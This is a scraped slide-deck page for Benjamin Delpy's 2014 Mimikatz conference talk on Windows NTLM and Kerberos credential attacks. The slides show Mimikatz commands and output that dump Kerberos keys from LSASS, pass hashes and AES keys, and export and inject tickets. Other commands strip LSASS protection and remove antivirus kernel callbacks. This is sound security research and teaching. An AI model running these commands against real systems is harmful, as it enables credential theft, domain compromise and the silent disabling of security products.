; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f529fcafb067a2f481239bad7e1fe956a874ac6669426d1df71b6c8ec16d537a Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK
Demo ! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 52
Microsoft ? They make good stuff, really! Windows 8.1 and backported to 7 – “Restricted Admin mode for Remote Desktop Connection” Prevent credentials to be sent on a remote server (network logon) Allow authentication by « pass-the-hash » & « pass-the-ticket » via CredSSP – “LSA Protection” Prevent access to LSASS process memory (protected process) Bypassed by a simple driver (this is a flag) – “Protected Users security group” No more NTLM, WDigest, CredSSP, no delegation or SSO... Kerberos only! Kerberos tickets can be stolen and injected… Windows 10 ??? – LSA credentials isolation (maybe) • Credentials outside the « main » OS ; • Crypto operation via RPC / LPC • Performance ? By default ? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 53
Kernel time Mimikatz includes a driver to play with the Kernel part of Windows… It’s signed with an expired certificate…. So it works, even in x64 So I can unprotect protected process  …or protect unprotected process (?) !processprotect /process:lsass.exe /remove 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 54
Contre-rump express newsoft time… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 55
“Killing any security product … using a Mimikatz undocumented feature” 20/11/2014 BBenjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 56 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 20 2014 01:35:31) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # !+ [*] mimikatz driver not present [+] mimikatz driver successfully registered [+] mimikatz driver ACL to everyone [+] mimikatz driver started mimikatz # !notifprocess [00] 0x82913758 [ntkrnlpa.exe + 0x000be758] [01] 0x88AE0D74 [MpFilter.sys + 0x0000ad74] [02] 0x88D799D8 [ksecdd.sys + 0x0000c9d8] [03] 0x88D84D96 [cng.sys + 0x00004d96] [04] 0x88E9BFA5 [tcpip.sys + 0x00081fa5] [05] 0x82F14DFC [CI.dll + 0x0000edfc] [06] 0xA1C341D9 [peauth.sys + 0x0000c1d9] mimikatz # !notifobject […] * Process * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x88AF9FFE [MpFilter.sys + 0x00023ffe] Open - 0x82A65E93 [ntkrnlpa.exe + 0x00210e93] mimikatz # !notifprocessremove 0x88AE0D74 Target = 0x88AE0D74 Removed : 0x88AE0D74 [MpFilter.sys + 0x0000ad74] mimikatz # !notifobjectremove 0x89A54160 Target = 0x89A54160 * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x88AF9FFE [MpFilter.sys + 0x00023ffe] * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x85D2E048 [ ? ]
That’s all Folks! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 57 blog http://blog.gentilkiwi.com mimikatz http://blog.gentilkiwi.com/mimikatz source https://github.com/gentilkiwi/mimikatz contact @gentilkiwi / benjamin@gentilkiwi.com

More Related Content

PPTX
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
PDF
Performance Analysis Tools for Linux Kernel
bylcplcp1
 
PDF
eBPF Trace from Kernel to Userspace
bySUSE Labs Taipei
 
PPT
Introduction to redis
byTanu Siwag
 
PDF
DevConf 2014 Kernel Networking Walkthrough
byThomas Graf
 
PDF
Rapid Home Provisioning
byLudovico Caldara
 
PPTX
Cloning Oracle EBS R12: A Step by Step Procedure
byOrazer Technologies
 
PDF
Linux cheat sheet
byDimitris Kyrgiafinis
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
Performance Analysis Tools for Linux Kernel
bylcplcp1
 
eBPF Trace from Kernel to Userspace
bySUSE Labs Taipei
 
Introduction to redis
byTanu Siwag
 
DevConf 2014 Kernel Networking Walkthrough
byThomas Graf
 
Rapid Home Provisioning
byLudovico Caldara
 
Cloning Oracle EBS R12: A Step by Step Procedure
byOrazer Technologies
 
Linux cheat sheet
byDimitris Kyrgiafinis
 

What's hot

PDF
BPF Internals (eBPF)
byBrendan Gregg
 
PDF
Security Monitoring with eBPF
byAlex Maestretti
 
PDF
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
byScyllaDB
 
PDF
BPF - in-kernel virtual machine
byAlexei Starovoitov
 
PDF
Linux Performance Profiling and Monitoring
byGeorg Schönberger
 
PDF
Fun with Network Interfaces
byKernel TLV
 
ODP
Dpdk performance
byStephen Hemminger
 
ODP
eBPF maps 101
bySUSE Labs Taipei
 
PDF
Analysis of Open-Source Drivers for IEEE 802.11 WLANs
byDanh Nguyen
 
PDF
Kdump and the kernel crash dump analysis
byBuland Singh
 
PDF
Linux Kernel - Virtual File System
byAdrian Huang
 
PDF
PostgreSQL Deep Internal
byEXEM
 
PDF
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
byAdrian Huang
 
PDF
Page cache in Linux kernel
byAdrian Huang
 
PDF
Stop the Guessing: Performance Methodologies for Production Systems
byBrendan Gregg
 
PDF
Linux Performance Analysis and Tools
byBrendan Gregg
 
PDF
PostgreSQL Extensions: A deeper look
byJignesh Shah
 
ODP
Logical replication with pglogical
byUmair Shahid
 
ODP
Lisa 2015-gluster fs-hands-on
byGluster.org
 
PPTX
2020 - OCI Key Concepts for Oracle DBAs
byMarcus Vinicius Miguel Pedro
 
BPF Internals (eBPF)
byBrendan Gregg
 
Security Monitoring with eBPF
byAlex Maestretti
 
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
byScyllaDB
 
BPF - in-kernel virtual machine
byAlexei Starovoitov
 
Linux Performance Profiling and Monitoring
byGeorg Schönberger
 
Fun with Network Interfaces
byKernel TLV
 
Dpdk performance
byStephen Hemminger
 
eBPF maps 101
bySUSE Labs Taipei
 
Analysis of Open-Source Drivers for IEEE 802.11 WLANs
byDanh Nguyen
 
Kdump and the kernel crash dump analysis
byBuland Singh
 
Linux Kernel - Virtual File System
byAdrian Huang
 
PostgreSQL Deep Internal
byEXEM
 
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
byAdrian Huang
 
Page cache in Linux kernel
byAdrian Huang
 
Stop the Guessing: Performance Methodologies for Production Systems
byBrendan Gregg
 
Linux Performance Analysis and Tools
byBrendan Gregg
 
PostgreSQL Extensions: A deeper look
byJignesh Shah
 
Logical replication with pglogical
byUmair Shahid
 
Lisa 2015-gluster fs-hands-on
byGluster.org
 
2020 - OCI Key Concepts for Oracle DBAs
byMarcus Vinicius Miguel Pedro
 

Similar to NSC #2 - D2 02 - Benjamin Delpy - Mimikatz

PPTX
Passwords#14 - mimikatz
byBenjamin Delpy
 
PDF
SpecterOps Webinar Week - Kerberoasting Revisisted
byWill Schroeder
 
PDF
DerbyCon 2019 - Kerberoasting Revisited
byWill Schroeder
 
PDF
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
PPTX
Golden ticket, pass the ticket mi tm kerberos attacks explained
byPeter Swedin
 
PDF
In the Wake of Kerberoast
byken_kitahara
 
PDF
Abusing Microsoft Kerberos - Sorry you guys don’t get it
byE Hacking
 
PPTX
mimikatz @ rmll
byBenjamin Delpy
 
PPTX
[HUN][Hackersuli] Tickets Please - Kerberos
byhackersuli
 
PDF
Kerberos survival guide
byJ.D. Wade
 
PDF
Deep Dive In To Kerberos
byIshan A B Ambanwela
 
PPTX
Kerberos Survival Guide: SharePointalooza
byJ.D. Wade
 
PPTX
Kerberos Survival Guide: Columbus 2015
byJ.D. Wade
 
PDF
Kerberos presentation
byChris Geier
 
PPTX
SPS Ozarks 2012: Kerberos Survival Guide
byJ.D. Wade
 
PPTX
Kerberos survival guide SPS Kansas City
byJ.D. Wade
 
PDF
Kerberos Survival Guide - St. Louis Day of .Net
byJ.D. Wade
 
PPTX
Kerberos Survival Guide: SharePoint Saturday Nashville 2015
byJ.D. Wade
 
PPT
Using Kerberos
byanusachu .
 
PDF
Hacker Halted 2014 - How to create permanent Domain Administrator privilege (...
byEC-Council
 
Passwords#14 - mimikatz
byBenjamin Delpy
 
SpecterOps Webinar Week - Kerberoasting Revisisted
byWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
byWill Schroeder
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
Golden ticket, pass the ticket mi tm kerberos attacks explained
byPeter Swedin
 
In the Wake of Kerberoast
byken_kitahara
 
Abusing Microsoft Kerberos - Sorry you guys don’t get it
byE Hacking
 
mimikatz @ rmll
byBenjamin Delpy
 
[HUN][Hackersuli] Tickets Please - Kerberos
byhackersuli
 
Kerberos survival guide
byJ.D. Wade
 
Deep Dive In To Kerberos
byIshan A B Ambanwela
 
Kerberos Survival Guide: SharePointalooza
byJ.D. Wade
 
Kerberos Survival Guide: Columbus 2015
byJ.D. Wade
 
Kerberos presentation
byChris Geier
 
SPS Ozarks 2012: Kerberos Survival Guide
byJ.D. Wade
 
Kerberos survival guide SPS Kansas City
byJ.D. Wade
 
Kerberos Survival Guide - St. Louis Day of .Net
byJ.D. Wade
 
Kerberos Survival Guide: SharePoint Saturday Nashville 2015
byJ.D. Wade
 
Using Kerberos
byanusachu .
 
Hacker Halted 2014 - How to create permanent Domain Administrator privilege (...
byEC-Council
 

More from NoSuchCon

PDF
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
byNoSuchCon
 
PDF
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
byNoSuchCon
 
PDF
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
byNoSuchCon
 
PDF
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
byNoSuchCon
 
PDF
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
byNoSuchCon
 
PDF
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
byNoSuchCon
 
PDF
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
byNoSuchCon
 
PDF
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
byNoSuchCon
 
PDF
NSC #2 - Challenge Solution
byNoSuchCon
 
PDF
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
byNoSuchCon
 
PDF
NSC #2 - Challenge Introduction
byNoSuchCon
 
PDF
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
byNoSuchCon
 
PDF
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
byNoSuchCon
 
PDF
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
byNoSuchCon
 
PDF
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
byNoSuchCon
 
PDF
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
byNoSuchCon
 
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
byNoSuchCon
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
byNoSuchCon
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
byNoSuchCon
 
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
byNoSuchCon
 
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
byNoSuchCon
 
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
byNoSuchCon
 
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
byNoSuchCon
 
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
byNoSuchCon
 
NSC #2 - Challenge Solution
byNoSuchCon
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
byNoSuchCon
 
NSC #2 - Challenge Introduction
byNoSuchCon
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
byNoSuchCon
 
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
byNoSuchCon
 
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
byNoSuchCon
 
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
byNoSuchCon
 
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
byNoSuchCon
 

Recently uploaded

PDF
The year in review - MarvelClient in 2025
bypanagenda
 
PDF
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
PDF
December Patch Tuesday
byIvanti
 
PDF
Eredità digitale sugli smartphone: cosa resta di noi nei dispositivi mobili
bySpeck&Tech
 
PDF
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Day 1 - Cloud Security Strategy and Planning ~ 2nd Sight Lab ~ Cloud Security...
by2nd Sight Lab
 
PDF
Day 2 - Network Security ~ 2nd Sight Lab ~ Cloud Security Class ~ 2020
by2nd Sight Lab
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
DOCX
Introduction to the World of Computers (Hardware & Software)
byALIABBAS ABASOV
 
PPTX
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
PDF
API-First Architecture in Financial Systems
bycyy111112
 
PPTX
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
PDF
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
PDF
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
PPTX
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
PDF
Six Shifts For 2026 (And The Next Six Years)
byDavid Armano
 
PPTX
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PPTX
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
The year in review - MarvelClient in 2025
bypanagenda
 
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
December Patch Tuesday
byIvanti
 
Eredità digitale sugli smartphone: cosa resta di noi nei dispositivi mobili
bySpeck&Tech
 
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Day 1 - Cloud Security Strategy and Planning ~ 2nd Sight Lab ~ Cloud Security...
by2nd Sight Lab
 
Day 2 - Network Security ~ 2nd Sight Lab ~ Cloud Security Class ~ 2020
by2nd Sight Lab
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
Introduction to the World of Computers (Hardware & Software)
byALIABBAS ABASOV
 
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
API-First Architecture in Financial Systems
bycyy111112
 
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
Six Shifts For 2026 (And The Next Six Years)
byDavid Armano
 
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz

  • 1.
    mimikatz and yourcredentials ‘you’ll hate your SSO’ Benjamin DELPY `gentilkiwi`
  • 2.
    `whoami` ? Benjamin DELPY- @gentilkiwi – Security researcher at night (it’s not my work) • A French guy with one flashy Tahitian shirt – Author of mimikatz • This little program that I wrote to learn C (and that your CISO hates) – Presented at Black Hat, Defcon, PHDays, BlueHat, and more • Despite, my excellent English, yeah – I’m: • Nice*, a kiwi – I’m not: • CISSP, CISA, OSCP, CHFI, CEH, ISO*, MCSA, CHFI, PASSI, […] *… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 2
  • 3.
    You see itevery morning…
  • 4.
    Or this oneif you’re lucky…
  • 5.
    Still probably a littlebit this one :)
  • 6.
    mimikatz :: sekurlsa LSA( level) 14/03/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 6 LsaSSWinLogon Authentication Packages msv1_0 tspkg wdigest livessp kerberos Authentication msv1_0 kerberos SAM Challenge Response user:domain:password PLAYSKOOL
  • 7.
    A little reminderabout NTLM authentication 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 7 waza 1234/ NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a d0e9aee149655a60 75e4540af1f22d3b LSASS (msv1_0) Domain Controller NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a cc36cf7a8514893e fccd332446158b1a LSASS (msv1_0)
  • 8.
    Normal NTLM authenticationVS Pass-the-Hash know your enemy 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 8 Normal
  • 9.
    A little reminderabout Kerberos authentication How does it works ? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 9 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
  • 10.
    A little reminderabout Kerberos authentication The KDC will validate the authentication if it can decrypt the timestamp with the long-term user key (for RC4, the NTLM hash of the user password) It issues a TGT representing the user in the domain, for a specified period 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 10 RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a * Kerberos-Newer-Keys Default Salt : LAB.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f5 5865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 KDC waza 1234/ rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a 20140807054500Z timestamp ① AS-REQ ② AS-REPTGT
  • 11.
    A little reminderabout Kerberos authentication PAC (MS Specific) The KDC will create a Microsoft specific structure (PAC) with user information This PAC is signed with the target key, and the KDC key – for a TGT, the target is also the KDC, so it is the same key, 3f66b877d01affcc631f465e6e5ed449 for RC4 – KDC keys are in the krbtgt account 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 11 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC Username : Administrateur Domain SID S-1-5-21-130452501-2365100805- 3685010670 User ID 500 Administrateur Groups ID 512 Admins du domaine 519 Administrateurs de l’entreprise 518 Administrateurs du schéma … Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 3f66b877d01affcc631f465e6e5ed449 CHECKSUM_KDC – HMAC_MD5 - krbtgt 3f66b877d01affcc631f465e6e5ed449
  • 12.
    A little reminderabout Kerberos authentication TGT This TGT is encrypted with a key shared between all KDC – The RC4 key for the krbtgt account : 3f66b877d01affcc631f465e6e5ed449 The KDC adds the Microsoft specific PAC to a structure with user’s information 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 12 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC TGT Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014 10:46:09 ; 21/07/2014 00:46:09 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB ; @ LAB.LOCAL Client Name (01) : Administrateur ; @ LAB.LOCAL ( LAB ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f3bf2e0e26903703bec6259b400a586f403bbfe3771cb797 2be3c0868cb9cc69 RC4-HMAC – krbtgt 3f66b877d01affcc631f465e6e5ed449 Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
  • 13.
    Let’s play agame, Windows Kerberos
  • 14.
    Windows Kerberos What canwe do with multiple sessions in memory? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 14 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
  • 15.
    Windows Kerberos Keys… 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 15 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 17 2014 00:53:48) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 142976 (00000000:00022e80) Session : Interactive from 1 User Name : Administrator Domain : LAB SID : S-1-5-21-2929287289-1204109396-1883388597-500 * Username : Administrator * Domain : LAB.LOCAL * Password : waza1234/ * Key List : aes256_hmac 1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b aes128_hmac a62abee318bc8877b6d402bde49ddd61 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a rc4_hmac_old cc36cf7a8514893efccd332446158b1a rc4_md4 cc36cf7a8514893efccd332446158b1a rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a
  • 16.
    Windows Kerberos Overpass-the-hash With aRC4 key (NTLM hash !) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 16 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage cc36cf7a8514893e fccd332446158b1a
  • 17.
    Windows Kerberos Overpass-the-hash With anAES key (linked to the password too) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 17 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b
  • 18.
    Windows Kerberos Overpass-the-hash 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 18 mimikatz # sekurlsa::pth /user:Administrator /domain:LAB.LOCAL /rc4:cc36cf7a8514893efccd332446158b1a user : Administrator domain : LAB.LOCAL program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 3632 | TID 3924 | LUID 0 ; 442172 (00000000:0006bf3c) _ msv1_0 - data copy @ 00B30F54 : OK ! _ kerberos - data copy @ 00BC5C18 _ aes256_hmac -> null _ aes128_hmac -> null _ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null mimikatz # sekurlsa::pth /user:Administrator /domain:LAB.LOCAL /aes256:1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b user : Administrator domain : LAB.LOCAL program : cmd.exe AES256 : 1a7ddce7264573ae1f498ff41614cc78001cbf6e3142857cce2566ce74a7f25b | PID 2120 | TID 2204 | LUID 0 ; 438984 (00000000:0006b2c8) _ msv1_0 - data copy @ 00B2936C : OK ! _ kerberos - data copy @ 00BC5A68 _ aes256_hmac OK _ aes128_hmac -> null _ rc4_hmac_nt -> null _ rc4_hmac_old -> null _ rc4_md4 -> null _ rc4_hmac_nt_exp -> null _ rc4_hmac_old_exp -> null _ *Password replace -> null
  • 19.
    A little reminderabout Kerberos authentication What else? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 19 waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac 1a7ddce7264573ae 1f498ff41614cc78 001cbf6e3142857c ce2566ce74a7f25b KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win10
  • 20.
    A little reminderabout Kerberos authentication Tickets… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 20 mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 963494 (00000000:000eb3a6) Session : Interactive from 2 User Name : Administrator Domain : LAB SID : S-1-5-21-2929287289-1204109396-1883388597-500 […] Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 19/11/2014 03:00:52 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : cifs ; dc.lab.local ; @ LAB.LOCAL […] Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 13d5f91632296f1d2bc658793ffc458f7abac80ef062aa908359f7eaa1f9b946 Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...] * Saved to file [0;eb3a6]-0-0-40a50000-Administrator@cifs-dc.lab.local.kirbi ! [00000001] Start/End/MaxRenew: 19/11/2014 03:00:13 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : ldap ; dc.lab.local ; @ LAB.LOCAL […] Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac e4a2150bec28971ce4100c21462c34cf194a0d896ef09caf8c126a397d11a4a0 Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...] * Saved to file [0;eb3a6]-0-1-40a50000-Administrator@ldap-dc.lab.local.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 19/11/2014 03:00:12 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL […] Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 7f75a0085ce638ff7dc43c1ee11f8d478f8ff1e4c863769f95f390223cebdc1a Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;eb3a6]-2-1-40e10000-Administrator@krbtgt-LAB.LOCAL.kirbi !
  • 21.
